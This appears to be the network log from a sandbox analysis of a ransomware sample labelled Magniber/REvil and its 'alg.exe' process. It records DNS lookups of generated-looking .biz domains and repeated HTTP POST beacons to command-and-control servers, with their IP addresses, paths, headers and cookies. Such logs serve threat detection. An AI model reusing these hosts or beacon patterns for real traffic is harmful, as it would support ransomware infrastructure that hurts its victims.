oshhkdluh.biz

IN A

54.244.188.177
POST

http://jpskm.biz/tdv

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.211.97.45:80

Request

POST /tdv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jpskm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fd271effdda5dab02105b845c197f909|191.101.209.39|1719160421|1719160421|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://oshhkdluh.biz/elsqqjnb

alg.exe

Remote address:

54.244.188.177:80

Request

POST /elsqqjnb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4e66da925c1d2f6277127a40af4f838d|191.101.209.39|1719160421|1719160421|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

lrxdmhrr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lrxdmhrr.biz

IN A

Response

lrxdmhrr.biz

IN A

54.244.188.177
DNS

yunalwv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yunalwv.biz

IN A

Response

yunalwv.biz

IN A

208.100.26.245
POST

http://lrxdmhrr.biz/gtxnr

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

54.244.188.177:80

Request

POST /gtxnr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6e01fc7bafb8a7d8e9a47d5d565b9b86|191.101.209.39|1719160422|1719160422|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jpskm.biz

alg.exe

Remote address:

8.8.8.8:53

Request

jpskm.biz

IN A

Response

jpskm.biz

IN A

34.211.97.45
DNS

mjheo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

mjheo.biz

IN A

Response

mjheo.biz

IN A

44.221.84.105
POST

http://jpskm.biz/shrnabr

alg.exe

Remote address:

34.211.97.45:80

Request

POST /shrnabr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jpskm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a4ee722636ba3f449dfb6ea9fa702cc3|191.101.209.39|1719160422|1719160422|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

wllvnzb.biz

alg.exe

Remote address:

8.8.8.8:53

Request

wllvnzb.biz

IN A

Response

wllvnzb.biz

IN A

18.141.10.107
POST

http://wllvnzb.biz/jtl

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.141.10.107:80

Request

POST /jtl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b13ff0d1829d25c0eec1cddfbedff8ec|191.101.209.39|1719160423|1719160423|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

lrxdmhrr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lrxdmhrr.biz

IN A

Response

lrxdmhrr.biz

IN A

54.244.188.177
POST

http://lrxdmhrr.biz/fwtdygyp

alg.exe

Remote address:

54.244.188.177:80

Request

POST /fwtdygyp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4e9aa51965481fe84d6949ff17c3bef5|191.101.209.39|1719160423|1719160423|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

wllvnzb.biz

alg.exe

Remote address:

8.8.8.8:53

Request

wllvnzb.biz

IN A

Response

wllvnzb.biz

IN A

18.141.10.107
POST

http://wllvnzb.biz/bxhyix

alg.exe

Remote address:

18.141.10.107:80

Request

POST /bxhyix HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=dc96be283a22fd82b190e7f0ee2b856e|191.101.209.39|1719160424|1719160424|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gnqgo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gnqgo.biz

IN A

Response

gnqgo.biz

IN A

18.208.156.248
POST

http://gnqgo.biz/cnngnhfm

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /cnngnhfm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gnqgo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=914ea0697a27b93e91c8cf22b5ad9879|191.101.209.39|1719160423|1719160423|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jhvzpcfg.biz

alg.exe

Remote address:

8.8.8.8:53

Request

jhvzpcfg.biz

IN A

Response

jhvzpcfg.biz

IN A

44.221.84.105
POST

http://jhvzpcfg.biz/ssij

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /ssij HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a9ee5c8c786183f34bc1ca8bfc793b30|191.101.209.39|1719160424|1719160424|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

acwjcqqv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

acwjcqqv.biz

IN A

Response

acwjcqqv.biz

IN A

18.141.10.107
POST

http://acwjcqqv.biz/n

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.141.10.107:80

Request

POST /n HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=30b722f64c33b8a0e0be09344604664e|191.101.209.39|1719160425|1719160425|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gnqgo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gnqgo.biz

IN A

Response

gnqgo.biz

IN A

18.208.156.248
POST

http://gnqgo.biz/elxnfsbaqbuod

alg.exe

Remote address:

18.208.156.248:80

Request

POST /elxnfsbaqbuod HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gnqgo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3d5920e444d76d06470f69e6d7d1e541|191.101.209.39|1719160424|1719160424|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jhvzpcfg.biz

alg.exe

Remote address:

8.8.8.8:53

Request

jhvzpcfg.biz

IN A

Response

jhvzpcfg.biz

IN A

44.221.84.105
POST

http://jhvzpcfg.biz/uqrjgkvnkj

alg.exe

Remote address:

44.221.84.105:80

Request

POST /uqrjgkvnkj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=669aeda671b91d6bf5a69368d77b1cfc|191.101.209.39|1719160424|1719160424|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

acwjcqqv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

acwjcqqv.biz

IN A

Response

acwjcqqv.biz

IN A

18.141.10.107
POST

http://acwjcqqv.biz/vscgxqyrpa

alg.exe

Remote address:

18.141.10.107:80

Request

POST /vscgxqyrpa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9eecc2aa83a40f533a6546bfa953f337|191.101.209.39|1719160425|1719160425|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

lejtdj.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lejtdj.biz

IN A

Response
DNS

vyome.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vyome.biz

IN A

Response

vyome.biz

IN A

44.213.104.86
POST

http://vyome.biz/uedb

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.213.104.86:80

Request

POST /uedb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6abb26791eead2788b73b354289075a4|191.101.209.39|1719160425|1719160425|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yauexmxk.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yauexmxk.biz

IN A

Response

yauexmxk.biz

IN A

18.208.156.248
POST

http://yauexmxk.biz/p

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /p HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9204cbcd3a29d6f3e522bf1e099f7131|191.101.209.39|1719160425|1719160425|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

iuzpxe.biz

alg.exe

Remote address:

8.8.8.8:53

Request

iuzpxe.biz

IN A

Response

iuzpxe.biz

IN A

13.251.16.150
POST

http://iuzpxe.biz/hwteskrqdafmt

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

13.251.16.150:80

Request

POST /hwteskrqdafmt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e5ea23c643583ec8bf54018eb8eb3b3b|191.101.209.39|1719160426|1719160426|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

lejtdj.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lejtdj.biz

IN A

Response
DNS

vyome.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vyome.biz

IN A

Response

vyome.biz

IN A

44.213.104.86
POST

http://vyome.biz/r

alg.exe

Remote address:

44.213.104.86:80

Request

POST /r HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e69b7b5a764a456633ae06c9a68d592d|191.101.209.39|1719160426|1719160426|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yauexmxk.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yauexmxk.biz

IN A

Response

yauexmxk.biz

IN A

18.208.156.248
POST

http://yauexmxk.biz/imupdvoamilqva

alg.exe

Remote address:

18.208.156.248:80

Request

POST /imupdvoamilqva HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=491b9c29b2f53c7fbc31fd3e86b91d8f|191.101.209.39|1719160426|1719160426|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

iuzpxe.biz

alg.exe

Remote address:

8.8.8.8:53

Request

iuzpxe.biz

IN A

Response

iuzpxe.biz

IN A

13.251.16.150
POST

http://iuzpxe.biz/yyoteokngq

alg.exe

Remote address:

13.251.16.150:80

Request

POST /yyoteokngq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=973a99da91cbd048ad92592d1a4a19d8|191.101.209.39|1719160427|1719160427|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

sxmiywsfv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

sxmiywsfv.biz

IN A

Response

sxmiywsfv.biz

IN A

13.251.16.150
POST

http://sxmiywsfv.biz/yq

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

13.251.16.150:80

Request

POST /yq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4510036bf55d60f59eff4eb4865936eb|191.101.209.39|1719160427|1719160427|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

sxmiywsfv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

sxmiywsfv.biz

IN A

Response

sxmiywsfv.biz

IN A

13.251.16.150
POST

http://sxmiywsfv.biz/kwihkufqghoig

alg.exe

Remote address:

13.251.16.150:80

Request

POST /kwihkufqghoig HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=536b1dccdf3d5f34abc55768c83f19b4|191.101.209.39|1719160428|1719160428|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

vrrazpdh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vrrazpdh.biz

IN A

Response

vrrazpdh.biz

IN A

34.211.97.45
POST

http://vrrazpdh.biz/i

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.211.97.45:80

Request

POST /i HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vrrazpdh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a5c0ee139860f1e6c101d56582b19423|191.101.209.39|1719160428|1719160428|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ftxlah.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ftxlah.biz

IN A

Response

ftxlah.biz

IN A

47.129.31.212
POST

http://ftxlah.biz/npd

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

47.129.31.212:80

Request

POST /npd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ftxlah.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=dadcd86535975280ad72f34308b8133f|191.101.209.39|1719160429|1719160429|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

vrrazpdh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vrrazpdh.biz

IN A

Response

vrrazpdh.biz

IN A

34.211.97.45
POST

http://vrrazpdh.biz/nlhuo

alg.exe

Remote address:

34.211.97.45:80

Request

POST /nlhuo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vrrazpdh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8ec427f3c0c6b2927096db2225cbe8fb|191.101.209.39|1719160429|1719160429|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ftxlah.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ftxlah.biz

IN A

Response

ftxlah.biz

IN A

47.129.31.212
POST

http://ftxlah.biz/ql

alg.exe

Remote address:

47.129.31.212:80

Request

POST /ql HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ftxlah.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

